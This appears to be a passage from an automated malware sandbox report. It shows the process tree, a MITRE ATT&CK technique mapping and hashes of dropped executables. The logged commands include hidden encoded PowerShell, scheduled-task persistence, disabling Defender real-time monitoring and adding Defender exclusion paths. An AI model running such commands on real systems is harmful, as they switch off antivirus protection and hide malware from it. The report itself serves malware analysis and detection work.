  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1656
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1608
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:2228
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:2680
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1476
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:1984
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2016

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
- Modifies data under HKEY_USERS
PID:2940

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2616

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1536

C:\Windows\system32\taskeng.exe
taskeng.exe {4A01D907-0188-43B8-9707-2CB449ECA6C6} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2836
- C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\nfxPIWAHevJCnXs\FJMmqgN.exe
  C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\nfxPIWAHevJCnXs\FJMmqgN.exe hp /Ilsite_idpRh 385118 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:1920
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gZsLsAZfN" /SC once /ST 15:09:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:840
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gZsLsAZfN"
    3⤵
    PID:2920
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gZsLsAZfN"
    3⤵
    PID:548
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:2372
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1472
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:2484
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1940
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gpDRyPlVW" /SC once /ST 03:48:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2624
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gpDRyPlVW"
    3⤵
    PID:2644
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gpDRyPlVW"
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2116
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1728
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1768
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3044
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2284
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:900
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2224
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:876
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\fgekRaJKKiJdEvwV\GtbXgFUv\hdAZdqJnNWGcVHJo.wsf"
    3⤵
    PID:2928
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\fgekRaJKKiJdEvwV\GtbXgFUv\hdAZdqJnNWGcVHJo.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:1724
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DufnooWHNFUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2736
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DufnooWHNFUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1700
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAvstfEYU" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:944
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAvstfEYU" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1848
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WNdNVmbTRKpEC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2520
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\cvDkMpEVJyabfeVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:808
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1380
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2636
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1280
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1904
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAvstfEYU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2416
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DufnooWHNFUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1732
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DufnooWHNFUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2064
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:776
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2916
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\cvDkMpEVJyabfeVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2152
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdTGWCKIydsYsNrSARR" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1236
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdTGWCKIydsYsNrSARR" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2184
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gNEkwGGiCnIU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2228
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gNEkwGGiCnIU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2128
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WNdNVmbTRKpEC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1288
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAvstfEYU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2620
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WNdNVmbTRKpEC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2872
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WNdNVmbTRKpEC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2824
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gNEkwGGiCnIU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3040
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdTGWCKIydsYsNrSARR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1996
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\cvDkMpEVJyabfeVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2988
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\cvDkMpEVJyabfeVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1588
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2800
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:3044
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:672
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2592
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdTGWCKIydsYsNrSARR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1364
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gNEkwGGiCnIU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2992
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1884
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1908
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "glZdyshHl" /SC once /ST 17:51:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2832
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "glZdyshHl"
    3⤵
    PID:1980

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2828

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2112

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2056912811738235903-863552091381263735470620679-159389073-11815145001649460823"
1⤵
- Windows security bypass
PID:2736

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
e46887bda662037e2b6666e99d366238

SHA1
2d834ff41296aae47255ea97e0d1c3aed6a42454

SHA256
3852fc85e5abc2022b549746986572e017b3f905b2952a3a4a1f15f216f858ff

SHA512
defbd2a1a3e2ba8510df290c105d221b876241ccfc0a9195bb498e096e82c7d11806aeb3626a9ec18c70214682d6d84d488bc2dddb8fa9039e38d8d70914b27f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
5372673584d2c7eb34244a86793311c7

SHA1
de23dd867af5c04ef1da53ab622158d57d79c31c

SHA256
e76dbeeae40c98fa1819beae39759d89577f5654c75fc5c410a1a19cc2151146

SHA512
f85463dfb3c4f01c851aa1856bbbbd5bc8ef6232c3fb0ea37038fc96944abefbb71d328a1cff704d4478338c61cb80bd5d08c9dd0f94bf95b02a453476e5b462

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
ab930d94f2e2e5e248d8906351629ce9

SHA1
7c560e9c703245a47a8ecad50faaf943eca72cb2

SHA256
5ed18bc6e24460792ef230439ca66f20d91747d412c88fc6e84e78f16fee22e7

SHA512
2c789452c28d496439b419d93087d3470a03d74be22bf25ea34cb93776133e9da4f0694f676e01de812a2a84e55443e9989ab4764fa9b835b30dc6c49cea57d9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
6ddab71692ede807476455ce535b84eb

SHA1
0ccc6dc8a6a4fd615d1428353746b47ad046bb60

SHA256
9f82de12b0b2cea9842194a3580f1a15e186bc3a0c1463f1c223ccb97bfffb69

SHA512
fe68dfb06c2b0bc555d622567a35b333f84a2f255633a8e93a8db810605915da3380cc112ac7c359b045b67e5585b99f6d29f4d411c44fa68834125181260eab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U1J1BPYJ\syncUpd[1].exe

Filesize
76KB

MD5
73ab3d17d733fb2cd7490eac5c4a2842

SHA1
86d06f145c95da13e26f7c31a7c1d11ef77d03d0

SHA256
98b426198330e7e7fa27e7969a945f1caad331940a4bf11aead37c4a7daaea01

SHA512
7471b9f7034cee29a0d39a7ab08920a6cefb4bb4c4a2441a742e89c49f423c201aa602d358d6392121a6a96fa151bdea3c972c8dfb168c3210d89d06f64181ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8B8D.tmp\Install.exe

Filesize
1KB

MD5
fd12da5fe3c273934ae6b8bd9797a231

SHA1
95f3f812906129fae537d2d2b2c9842555e99975

SHA256
fa0844d436f2ed5a340ca75ff09e6b615241f5ca35770ff0ec4c53289f029648

SHA512
762d9ffafd268244539c159a3830e1d240e59ac5624d7e6c2be36f1ee9f9162f7f8fb802c3262d03957354d826434b7a4161901d7a3bf6f5184ef312c4fe38bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8B8D.tmp\Install.exe

Filesize
494KB

MD5
cc3d5061a4aaf474a05e6695f1162f66

SHA1
472ca55db4b660407508e3cded41f54cfbd5a3d6

SHA256
084bb4ed584c3c720d3632a9cda7e0ea18c36186675e2108cc359deeae898f1f

SHA512
fcbc1a1ecd8ebb6fae8d3615504b49eb94d1b690e5f2def4a68422383aaaafba2bb2f3d3b86edb033a38e6670c7c5c0ffd9521d4cc2d00555c187ddb51d372d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS9369.tmp\Install.exe

Filesize
567KB

MD5
0a925252c0d4423c3416b60de0e07511

SHA1
c34459d6d98b07d694777d2ada8067aa53194f50

SHA256
32f05f07fbbbf9224c5c1a5a96d228d2babb96503ecfdae36d04b47e7c95498b

SHA512
588003b4ce8569095d4e6d408d0e331bd8f00dc211c9d625d4076fa13df6e204f6f3ecb9c7566060a9270a2c45eef58bcf68bff8173f3046ed3d38d171792de7

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS9369.tmp\Install.exe

Filesize
710KB

MD5
b39737e5e4899cfbefc3f6afad45be89

SHA1
e94853eac243ec0fa37224adba2a293db41ecd8b

SHA256
9a51f7697cf9de40d66e727b11a36a53c0b926be9f34909c5887cc6042f115e3

SHA512
3d0b018e3e2c3f148297b842b77fd52e190649a78527efaffe64eb90f1ea290a5866229d4d2390cd3d03dedfa7e222467b8e20b240d9f76b414b7d38b557d682

Download Submit
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

Filesize
1KB

MD5
f9fc20416c63e0c37db5ac10f3fcba34

SHA1
68032c42bd13a5cddf36a92b437cc2548dc8ee79

SHA256
ff26411883409ecaa5bdeccb5f57bb4676ce22b9369104337f37bf11632faea1

SHA512
15413ea4a3f38c4fd3b88960bc35355702f078b5c98715f68b2431080396d47fb5111ed8b17f9b19fecf4807c9330d458be72ff4c0fa5aa77cc51431b7f08f27

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab4665.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

Filesize
3.8MB

MD5
48261f20b5250be1365a67aabc85fbe2

SHA1
453711dc8934b94eabd14e2f68999f4cb524eaec

SHA256
e5db462f4354b3e5c1e9f891d1706b212c4aa70d4532aefb13afd18995c3caec

SHA512
d80c2bb49108a714d4635801f2cbcc19d92c75dbef2149de464b477aee4e9840c13e97b3ac3db338104aebf0f878ed73c249f7ea66895489baf3fb41e4e62f4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

Filesize
395KB

MD5
5da3a881ef991e8010deed799f1a5aaf

SHA1
fea1acea7ed96d7c9788783781e90a2ea48c1a53

SHA256
f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4

SHA512
24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar46E5.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

Filesize
105KB

MD5
584297dfec8fe953cb2b6abc874d66c8

SHA1
03860aeb172550de8a36e6cf09b41b991edfc268

SHA256
057d53c2d8bfa280064419e74cd36edc4069afefd436095c6eb8c392c2f029ac

SHA512
2d9855e2404b44b9037c0be1d8296d754a91be64f5c38f64640d01c28608eab436a8aa8510259c19e8d51a37407c60c5a596080bb437ee4916e0c285117bbe08

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Filesize
118KB

MD5
fdd674057b37eb2a82ca3723e4666eda

SHA1
25a80b9c09256c9b0f49c37a77ea6849b30ab8e0

SHA256
604850a1b34a4820951904a5fcf566942e7fd465b709df82c8357715bde75220

SHA512
6c3b22acb777e812da480af205c33b234524dfefb9759b69b874e64503f199974298270e49b8416e76570cf57a7cc2dcab2c027d8f4711bce4f9186cc44868f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\nfxPIWAHevJCnXs\FJMmqgN.exe

Filesize
190KB

MD5
378897c318fb64b1b91ccbc37c5d3e78

SHA1
17fce651230a6ee10c28a57d08c6e6b60cec4211

SHA256
